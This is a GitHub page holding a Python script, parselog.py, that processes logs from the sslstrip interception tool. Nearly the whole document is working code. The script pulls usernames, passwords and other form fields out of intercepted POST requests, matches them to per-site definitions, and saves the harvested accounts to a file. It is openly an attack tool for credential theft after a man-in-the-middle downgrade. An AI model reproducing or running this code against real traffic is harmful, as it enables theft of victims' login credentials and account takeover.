WebGUI/parselog.py at master · nanderh/WebGUI · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
#!/usr/bin/env python

#####################
# ParseLog.py
#
# By z3ros3c@gmail.com
#####################

""" This file parses the sslstrip.log created by
    sslstrip for usernames and passwords (and other
    interesting information) defined in the file
    resources/definitions.sslstrip. It will also
    give you a complete list of all unknown information,
    with the exception of anything listed in the file
    resources/blacklist.sslstrip.
"""

from urllib import unquote

getIP = lambda origin: origin[origin.find('(')+1:origin.find(')')]

blacklist = []
accounts = []
definitions = {}

def getDefs(defs):
  d = {}
  for definition in defs:
    tmp = definition.split('|')
    a = tmp.pop(0)
    b = tmp.pop()
    if('\n' in b):
      b = b[:-1]
    tmp.append(b)
    d[a] = tmp[:]
  return d

def getAllVars(line):
  while('&&' in line):
    line = line.replace('&&','&')
  vars = {}
  tmp = line.split('&')
  for var in tmp:
    try:
      (a,b) = var.split('=')
      if('$' in unquote(a)):
        a = unquote(a).split('$').pop()
      if('\n' in unquote(b)):
        b = unquote(b)[:-1]
      vars[unquote(a)] = unquote(b)
    except:
      pass
  return vars

def process(origin,line):
  origin = getIP(origin)
  if(origin not in blacklist):
    vars = getAllVars(line)
    if(origin in definitions):
      definition = definitions[origin][:]
      name = definition.pop(0)
      account = "(%s) " % name
      for variable in definition:
        try:
          v = vars[variable]
        except:
          v = 'UNDEFINED'
        account += "%s = %s :: " % (variable,v)
      if('UNDEFINED' not in account):
        if(account not in accounts):
          accounts.append(account)
          account += "**NEW**"
        print(account)
    else:
      print("Unknown:\t%s" % origin)
      for var in vars:
        if(vars[var] != ""):
          print("\t%s:\t%s" % (var,vars[var]))
try:
  lines = open('sslstrip.log','r').readlines()
except:
  lines = []
try:
  blacklist = open('resources/blacklist.sslstrip','r').read().split('\n')
except:
  print("--blacklist not defined--")
try:
  accounts = open('accounts.txt','r').read().split('\n')
except:
  pass
try:
  definitions = getDefs(open('resources/definitions.sslstrip','r').readlines())
except:
  pass

try:
  line = lines.pop(0)
  while(1):
    while('POST' not in line):
      try:
        line = lines.pop(0)
      except:
        break
    process(line,lines.pop(0))
    try:
      line = lines.pop(0)
    except:
      break
except:
  print("Empty logfile.")

output = open('accounts.txt','a')
accounts.sort()
for account in accounts:
  if(account != ''):
    output.write(account + '\n')